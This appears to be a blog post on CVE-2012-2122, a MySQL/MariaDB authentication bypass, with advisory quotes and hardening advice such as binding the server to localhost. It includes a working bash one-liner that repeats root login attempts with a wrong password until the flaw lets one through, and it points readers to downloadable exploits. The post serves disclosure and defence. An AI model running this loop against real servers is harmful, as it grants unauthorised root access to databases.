CVE-2012-2122 : Serious Mysql Authentication Bypass Vulnerability
A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.
A serious security bug in MariaDB and MySQL Disclosed, According to Advisory All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable. This issue got assigned an id CVE-2012-2122.
"When a user connects to
MariaDB/MySQL, a token (SHAover a password and a random scramble string)
is calculated and comparedwith the expected value. Because of incorrect
casting, it might'vehappened that the token and the expected value were
considered equal,even if the memcmp() returned a non-zero value. In
this caseMySQL/MariaDB would think that the password is correct, even
while it isnot. Because the protocol uses random strings, the
probability ofhitting this bug is about 1/256."
"Which means, if one knows
a user name to connect (and "root" almostalways exists), she can
connect using *any* password by repeatingconnection attempts. ~300
attempts takes only a fraction of second, sobasically account password
protection is as good as nonexistent.Any client will do, there's no need
for a special libmysqlclient library."
The following one-liner in bash will provide access to an affected MySQL server as the root user account, without actually knowing the password.
$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>
Defense: The
first rule of securing MySQL is to not expose to the network at large in
the first place. Most Linux distributions bind the MySQL daemon to
localhost, preventing remote access to the service. In cases where
network access must be provided, MySQL also provides host-based access
controls. There are few use cases where the MySQL daemon should be
intentionally exposed to the wider network and without any form of
host-based access control.
the easiest thing to do is to
modify the my.cnf file in order to restrict access to the local system.
Open my.cnf with the editor of your choice, find the section labeled
[mysqld] and change (or add a new line to set) the "bind-address"
parameter to "127.0.0.1". Restart the MySQL service to apply this
setting.
Note: Download The Latest Exploits for CVE-2012-2122 From our TOOLS YARD section.
No comments:
Post a Comment